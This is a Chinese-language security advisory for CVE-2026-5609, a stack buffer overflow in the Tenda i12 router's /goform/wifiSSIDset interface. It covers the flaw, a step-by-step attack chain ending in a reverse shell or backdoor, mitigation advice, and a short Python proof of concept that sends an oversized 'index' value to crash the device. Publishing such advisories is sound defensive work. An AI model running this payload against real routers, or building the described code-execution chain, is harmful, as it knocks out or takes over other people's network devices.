CVE-2026-5609 CVSS 8.8 高危

CVE-2026-5609 Tenda i12 栈溢出漏洞

披露日期: 2026-04-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5609

漏洞类型

栈缓冲区溢出

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Tenda i12 路由器

漏洞概述

Tenda i12路由器固件版本1.0.0.11(3862)中存在严重的安全漏洞。该漏洞源于/goform/wifiSSIDset接口的formwrlSSIDset函数在处理参数时未进行有效的边界检查。攻击者可通过精心构造的恶意数据包，操纵index或wl_radio参数，触发基于栈的缓冲区溢出。由于该漏洞可被远程利用且无需用户交互，成功利用可能导致目标设备崩溃，或在系统上下文中执行任意代码，完全控制受影响设备。

技术细节

该漏洞属于典型的栈缓冲区溢出。在Tenda i12的HTTP服务器处理逻辑中，formwrlSSIDset函数负责解析来自/goform/wifiSSIDset的POST请求。关键问题在于对index或wl_radio参数的处理上，程序使用了不安全的拷贝函数（如strcpy），直接将用户可控的输入数据复制到固定大小的栈缓冲区中，而未验证输入长度。攻击者可以发送包含超长字符串的HTTP POST请求，当数据量超过缓冲区容量时，多余的数据将溢出并覆盖栈上的返回地址。通过精确控制溢出数据，攻击者可以重定向程序流指向预置的Shellcode或ROP链，最终实现远程代码执行（RCE）。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络或互联网，寻找开放Web管理界面的Tenda i12设备，确认固件版本为1.0.0.11(3862)。

STEP 2

2. 漏洞探测

攻击者向目标设备的/goform/wifiSSIDset端点发送特制的测试数据包，检测是否存在缓冲区溢出特征。

STEP 3

3. 漏洞利用

攻击者构造包含恶意Shellcode或ROP链的超长Payload，通过POST请求发送至目标接口，操纵index或wl_radio参数。

STEP 4

4. 代码执行

Payload触发栈溢出，覆盖返回地址，劫持程序执行流，最终在路由器上以root权限执行任意命令。

STEP 5

5. 建立控制

攻击者反弹Shell或植入后门，获取设备的持久控制权，窃取网络流量或作为跳板进行横向移动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target IP address of the vulnerable Tenda i12 router
target_ip = "192.168.0.1"
url = f"http://{target_ip}/goform/wifiSSIDset"

# Malicious payload to trigger stack overflow
# The exact offset depends on the specific firmware build
# Sending a long string to 'index' or 'wl_radio' parameter
payload = "A" * 1000

data = {
    "index": payload,
    # "wl_radio": payload 
}

try:
    print(f"Sending exploit payload to {url}...")
    response = requests.post(url, data=data, timeout=5)
    print(f"Response status code: {response.status_code}")
    # If the device crashes or hangs, the exploit likely succeeded
except requests.exceptions.RequestException as e:
    print(f"Connection error (device may have crashed): {e}")

影响范围

Tenda i12 1.0.0.11(3862)

防御指南

临时缓解措施

在官方发布补丁前，建议用户将路由器置于防火墙后，阻断从外网访问TCP 80端口的流量，并修改默认的管理员密码。同时，应关闭Wi-Fi的WPS功能，减少被攻击面。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5609
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5609
3 Details https://www.cvedetails.com/cve/CVE-2026-5609/
4 VulDB https://vuldb.com/cve/CVE-2026-5609
5 Link https://github.com/Litengzheng/vuldb_new/blob/main/i12/vul_107/README.md
6 Link https://vuldb.com/submit/785337
7 Link https://vuldb.com/vuln/355400
8 Link https://vuldb.com/vuln/355400/cti
9 Link https://www.tenda.com.cn/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表